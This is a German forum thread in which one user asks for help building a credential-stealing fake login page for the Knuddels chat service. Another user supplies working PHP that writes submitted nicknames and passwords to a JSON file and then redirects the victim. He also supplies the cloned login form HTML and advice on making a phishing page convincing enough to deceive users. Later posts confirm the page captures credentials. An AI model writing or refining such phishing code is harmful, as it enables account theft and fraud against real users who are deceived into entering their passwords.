PW-Stealer im Login (Hilfe)

[sl33p]

Hallo,

Ich habe nun nen' Script gefunden (PW-Stealer), wenn man seine Benutzerdaten eingibt, werden die in einer .txt-Datei auf nen'
FTP-Server gespeichert. Ich weiß, ziemlich alt und unsicher das ganze.. Und ich sitze schon ungelogen paar Stunden da dran um den PW-Stealer
zum laufen zu bekommen. Es funktioniert aber nicht. Ordner im download: (PW-Stealer) das ganze was dort drin ist funktioniert. Aber nun möchte ich
das ganze in den Ordner (PW-Stealer soll da rein) in der Index.html schreiben. Hab schon einiges ausprobiert bzw. versucht einiges zu löschen oder umzuschreiben.
Aber es funktioniert nicht, der PW-Stealer greift dann nichts mehr ab.

Kann sich wer das ganze mal bitte anschauen und mir das eventuell fertig schreiben? das es funktioniert. Für den einen der sich damit auskennt, sicherlich keine 10
Minuten arbeit. Wäre mega nett von euch, wenn er mir das ganze dann hochladen und per PN zu kommen lässt das ganze oder hier im Thread veröffentlicht zum download. Wäre schön, wenn der originale Button von Knuddels sowie Textbox benutzt werden kann.

Dankeschön für eure Aufmerksamkeit. :-)

[Bubble Gum]

A) Dein Redirect ist fail. Seit wann macht man das ganze als HTML-Tag? Du nutzt PHP, also nutze auch dementsprechende Methoden.

B) Wie soll das Formular funktionieren, wenn nicht angewiesen wird, was mit dem Formular passiert?

C) Warum iterierst durch die POST-Variablen? Nutze doch ein solides JSON, am besten sogar als Wrapper um das ganze dir später besser anzeigen und verarbeiten zu lassen:

PHP-Code:

<?php
    $file    = 'loggedinSave.txt';
    $url    = 'http://japanstiftung.co.de/';
    
    if(isset($_POST['action'])) {
        // Wenn Datei nicht existiert
        if(!file_exists($file)) {
            $data = [];
            
        // Ansonsten hole alten Content
        } else {
            $content    = file_get_contents($file);
            $data        = json_decode($content);
        }
        
        // Neue Daten hinzufügen
        $data[] = $_POST;
        
        // speichern
        file_put_contents($file, json_encode($data, JSON_PRETTY_PRINT));
        
        // weiterleiten...
        header('Location: ' . $url);
        exit();
    }
?>

Und bezüglich des Formulares, solltest du auch weitere Angaben machen:

• Das <form>-Tag ist komplett leer!
• Die Eingabefelder (<input>) haben keinen Namen!

Dementsprechend machst du von Zeile 2011 bis 2052 folgende Änderungen:

HTML-Code:

<!-- Setze POST-Request und die Target-PHP! >>>>>>>>>>>> --> <form method="post" action="login.php">
	<label class="InputField__textinput___jLHnP  ">
		<div class="Spacer__small___2TTCY"></div>
		<div style="position: relative; overflow: visible; background-color: transparent; flex-grow: 0; flex-shrink: 0; width: 24px; height: 24px; opacity: 0.44; background-position: center center; background-repeat: no-repeat; background-image: url(&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAABGdBTUEAALGPC/xhBQAAA1FJREFUaAXtmE1LMlEUx4+iWYSGUVKQughK6WUTlCC1CNqHLlpYG79IEn2AWrWRNq77BkGIFET7XqgWmVhtKrLQlDrPvRdG0oc7zniuDYEHZGacOef8f3Nmzr1zbcgM/rDZ/7B2Ib0LYHUFuxWwugKOTgio1WpQKBSgVCqJ8G63G8bGxsDpdKpPx9uoKnt+fsadnR1cXFzEoaEh3p7Fj+8vLS3h7u4uvry8qEon4oCqaEdHRzgzM1MXrYlv3s7OzuLx8bGqtKgE4PDwsOGON4tuPvb5fJjNZpVAkAGurq7Q7/e3vPPNEMFgEK+vr8kQJICvry9MJBKmxWswyWQSv7+/SRAkgJubG2Qdpm0A7nt7e0sCIA1k7MWtt0p2V00bb7M8BsVIABcXF5TcwpcagwTw/v5OBqDGIAEMDg6SAagxSABs4CIDkGNQWkCxWMTh4eG2uxAf0B4eHigSkFSB0dFRWF9fb7sKGxsbMDIy0ra/cCThM+enpyecn583XYW5uTnhS81PGsi05KwV4tTUlGGI6elpPD8/19xJWyUAXMHd3R2ura0hm/NLQRwOB8bjcczn8yTRP51t/ID2EDZ685H14OAATk5OxEcNP8s/ZqLRKKyursLy8jLYbLZGJ8KRcgBNS6VSgWq1Kg57enqgt7dXO6V02zEApSp1gpHaqE7cXzv15wGUrEq8vb2JF5a1RmBfWXB/fw+vr6/w8fEhKtHf3w8DAwMQCARgYmICwuGweLE9Hg+5Um0DlMtlyOVyouOcnp7C5eUlfH5+GhLkcrkgFApBJBKBWCwGbBUD+vr6DPn+d9HPnmpkn3UWzGQyuLCwIO33LImpcwwE9/f3kd0AIxIarjE1kJ2dneHKyoopcWZgeGyew4wZBkin0+j1ejsmXgNl7wru7e0ZZmgJwFceNjc30W63d1y8BsFGakylUshzt7KWANvb278mXAPQtltbW63066/MsTkNsmmAZQB8Ysg16Jm0Ao+Pjzg+Pm6ZeK0KXAPXIjPpSMw+F4EtOrE41hrXwLXITAqgcsorS270fz0tUgCjwa2+TgrAnjmrtdXz62mRfg/wuQ5bOq8HsXJncnJSOleSAlgp2Exu6SNkJoiV13YBrLz7PHe3AlZX4B+943iESeaVrgAAAABJRU5ErkJggg==&quot;); background-size: contain; border-style: none; display: flex;"></div>
		<div class="Spacer__tiny___2Bplo"></div>
		<!-- Setze "nickname" >>>>>>>>>>>> --> <input name="nickname" type="text" placeholder="Nutzername" class="InputField__input___3pAPo" aria-label="Nutzername" data-test-id="login-input-username">
		<div class="Spacer__small___2TTCY"></div>
	</label>
	<div class="Spacer__tiny___2Bplo"></div>
	<label class="InputField__textinput___jLHnP  ">
		<div class="Spacer__small___2TTCY"></div>
		<div style="position: relative; overflow: visible; background-color: transparent; flex-grow: 0; flex-shrink: 0; width: 24px; height: 24px; opacity: 0.44; background-position: center center; background-repeat: no-repeat; background-image: url(&quot;/static/k3/v1/images/icon-password@2x.93cb325e.png&quot;); background-size: contain; border-style: none; display: flex;"></div>
		<div class="Spacer__tiny___2Bplo"></div>
		<!-- Setze "password" >>>>>>>>>>>> --> <input type="password" name="password" placeholder="Passwort" class="InputField__input___3pAPo" aria-label="Passwort" data-test-id="login-input-password" value="">
		<div role="none" style="position: relative; display: flex; flex-direction: column; flex-grow: 0; flex-shrink: 0; overflow: hidden; align-items: stretch; width: 32px; height: 32px; padding: 4px; cursor: pointer;">
			<div style="position: relative; overflow: visible; background-color: transparent; flex-grow: 0; flex-shrink: 0; width: 24px; height: 24px; opacity: 0.33; background-position: center center; background-repeat: no-repeat; background-image: url(&quot;/static/k3/v1/images/icon-show.1e240a83.png&quot;); background-size: contain; border-style: none; display: flex;"></div>
		</div>
		<div class="Spacer__small___2TTCY"></div>
	</label>
	<div class="Spacer__tiny___2Bplo"></div>
	<div role="none" style="position: relative; display: flex; flex-direction: column; flex-grow: 0; flex-shrink: 0; overflow: hidden; align-items: stretch;">
		<div role="none" style="position: relative; display: flex; flex-direction: column; flex-grow: 0; flex-shrink: 0; overflow: hidden; align-items: stretch; cursor: pointer;">
			<div style="background-repeat: no-repeat; align-items: center;" class="Column__Column___15nJn " data-test-id="login-forgot-password-button">
				<div class="Spacer__tiny___2Bplo"></div>
				<div style="position: relative; display: inline; flex-grow: 0; flex-shrink: 0; overflow: hidden; white-space: pre-wrap; overflow-wrap: break-word; font-family: Source Sans Pro, Comic Sans MS, sans-serif; color: rgba(255, 255, 255, 0.66); font-size: 12px; line-height: 16px; cursor: inherit;"><span>Server Status: <span style="color:green"><b>Online!</b></span></span></div>
				<div class="Spacer__tiny___2Bplo"></div>
			</div>
		</div>
	</div>
	<div class="Spacer__tiny___2Bplo"></div>
	<div class="Spacer__base___SmVhb"></div>
	<div style="background-repeat: no-repeat; max-width: 100%;" class="Column__Column___15nJn " data-test-id="login-button-submit">
		<div class="Spacer__tiny___2Bplo"></div>
		<!-- Setze "action" >>>>>>>>>>>> --> <button name="action" class="Touchable__Touchable___3ndcT Button_styles__general___1zLHf Button_styles__primary___WLP23 Button_styles__normal___3vfMG Button_styles__onDark___2NJmr" type="submit">
			<div style="background-repeat: no-repeat;" class="Row__Row___31u9c container__alignItemsCenter___3lyhB">
				<div class="Spacer__auto___2VZ_B"></div>
				<div class="Button_styles__text___xBklW ">Einloggen</div>
				<div class="Spacer__auto___2VZ_B"></div>
			</div>
		</button>
		<div class="Spacer__tiny___2Bplo"></div>
	</div>
</form>

P.S. ungetestet - Außerdem glaube ich kaum, dass ein derartig schlechter Stealer anklang finden wird. Da wird sicher niemand so einfach hereinfallen, einfach weil das ganze so schlecht umgesetzt wurde, dass man direkt dies als Fake einstufen kann. Ein vernünftiger Stealer/Phisher sollte schon sehr nahe an Legimität sein; Es sollte nicht nur aussehen wie Knuddels, es sollte sich auch so anfühlen. Du musst dem Nutzer mit vollem Ernst vorgaukeln, dass dies was bringen würde. Und das erreichst du nicht, wenn du ein Teil der Seite von denen "kopierst" und dann in 0-8-15 eine Tabelle im 90er-Stil präsentierst, was zu dem viel zu quietschige Farben beinhaltet.

[sl33p]

Erstmal vielen Dank! Das du dir die mühe gemacht hast. Und ich nehme dein Feedback auch zu Herzen. :-)

Es hat auch alles super geklappt, bis auf.. das er die Sonderzeichen wie üäö usw. nicht erkennt wie hier:
[
{
"nickname": "iop\u00fco\u00fc",
"password": "op\u00fco+",
"action": ""
},
{

[Bubble Gum]

das er die Sonderzeichen wie üäö usw. nicht erkennt wie hier:

*palmface*

https://de.wikipedia.org/wiki/JavaSc...bject_Notation
https://www.json.org

Nutze doch ein solides JSON, am besten sogar als Wrapper um das ganze dir später besser anzeigen und verarbeiten zu lassen:

Man merkt, dass du noch nie mit irgendwelchen Sprachen in Berührung kamst. Der Bezug auf "später besser anzeigen und verarbeiten zu lassen" ist nicht, dass du die RAW-Datei öffnest und dort hereinschaust. P.S. Online JSON Viewer